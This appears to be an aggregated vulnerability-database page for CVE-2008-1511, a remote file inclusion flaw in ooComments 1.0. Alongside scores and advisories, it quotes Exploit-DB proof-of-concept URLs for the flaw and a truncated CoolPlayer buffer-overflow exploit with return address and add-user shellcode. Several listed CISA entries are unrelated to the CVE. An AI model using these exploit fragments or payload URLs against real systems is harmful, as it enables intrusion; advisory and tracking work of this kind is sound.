CVE-2008-1511
published 2008-03-25CVE-2008-1511: Multiple PHP remote file inclusion vulnerabilities in ooComments 1.0 allow remote attackers to execute arbitrary PHP code via a URL in the PathToComment…
PriorityP340critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
2.94%
85.4th percentile
Multiple PHP remote file inclusion vulnerabilities in ooComments 1.0 allow remote attackers to execute arbitrary PHP code via a URL in the PathToComment parameter for (1) classes/class_admin.php and (2) classes/class_comments.php. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| oocomments | oocomments | — | — |
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
cisa7.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-g5gj-rfrw-qg5p: Multiple PHP remote file inclusion vulnerabilities in ooComments 1
ghsa_unreviewed·2022-05-01
CVE-2008-1511 [HIGH] CWE-94 GHSA-g5gj-rfrw-qg5p: Multiple PHP remote file inclusion vulnerabilities in ooComments 1
Multiple PHP remote file inclusion vulnerabilities in ooComments 1.0 allow remote attackers to execute arbitrary PHP code via a URL in the PathToComment parameter for (1) classes/class_admin.php and (2) classes/class_comments.php. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
CISA
Microsoft Graphics Device Interface (GDI) Privilege Escalation Vulnerability
cisa·2022-03-03·CVSS 7.8
CVE-2017-0001 [HIGH] Microsoft Graphics Device Interface (GDI) Privilege Escalation Vulnerability
Vulnerability: Microsoft Graphics Device Interface (GDI) Privilege Escalation Vulnerability
Affected: Microsoft Graphics Device Interface (GDI)
The Graphics Device Interface (GDI) in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607 allows local users to gain privileges
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2017-0001
Remediation Due Date: 2022-03-24
CISA
Microsoft Malware Protection Engine Improper Restriction of Operations Vulnerability
cisa·2022-03-03·CVSS 7.8
CVE-2017-8540 [HIGH] CWE-119 Microsoft Malware Protection Engine Improper Restriction of Operations Vulnerability
Vulnerability: Microsoft Malware Protection Engine Improper Restriction of Operations Vulnerability
Affected: Microsoft Malware Protection Engine
The Microsoft Malware Protection Engine running on Microsoft Forefront and Microsoft Defender on Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016, Microsoft Exchange Server 2013 and 2016, does not properly scan a specially crafted file leading to memory corruption. aka "Microsoft Malware Protection Engine Remote Code Execution Vulnerability".
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2017-8540
Remediation Due Date: 2022-03-24
No detection rules found.
Exploit-DB
CoolPlayer 2.19 - '.Skin' Local Buffer Overflow
exploitdb·2008-12-22
CVE-2008-5735 CoolPlayer 2.19 - '.Skin' Local Buffer Overflow
CoolPlayer 2.19 - '.Skin' Local Buffer Overflow
---
# CoolPlayer (Skin) Buffer Overflow
# maybe all versions are affected :)
# By:Encrypt3d.M!nd
#
# Orginal Exploit: by r0ut3r
# http://www.milw0rm.com/exploits/7536
#
# i've test it on my box(winxp sp3) and didn't work
# so i've re-wrote the exploit and this is workin
# tested: Windows xp sp3 patched
# version tested:2.17,2.18,2.19
#
# Greetz:-=Mizo=-,L!0n,El Mariachi,MiNi SpIder,GGy,and all my friends
###################################################
chars = "A"*1511
eip = "\x6B\x8C\x49\x7E" #user32.dll jmp esp
header = "[CoolPlayer Skin]\nPlaylistSkin="
# win32_adduser - PASS=t35t EXITFUNC=seh USER=t35t Size=489
Encoder=PexAlphaNum http://metasploit.com
shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x
Exploit-DB
ooComments 1.0 - '/classes/class_admin.php?PathToComment' Remote File Inclusion
exploitdb·2008-03-22
CVE-2008-1511 ooComments 1.0 - '/classes/class_admin.php?PathToComment' Remote File Inclusion
ooComments 1.0 - '/classes/class_admin.php?PathToComment' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/28401/info
ooComments is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
ooComments 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/classes/class_admin.php?PathToComment=ZoRLu.txt?
Exploit-DB
ooComments 1.0 - '/classes/class_comments.php?PathToComment' Remote File Inclusion
exploitdb·2008-03-22
CVE-2008-1511 ooComments 1.0 - '/classes/class_comments.php?PathToComment' Remote File Inclusion
ooComments 1.0 - '/classes/class_comments.php?PathToComment' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/28401/info
ooComments is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
ooComments 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/classes/class_comments.php?PathToComment=ZoRLu.txt?
No writeups or analysis indexed.
2008-03-25
Published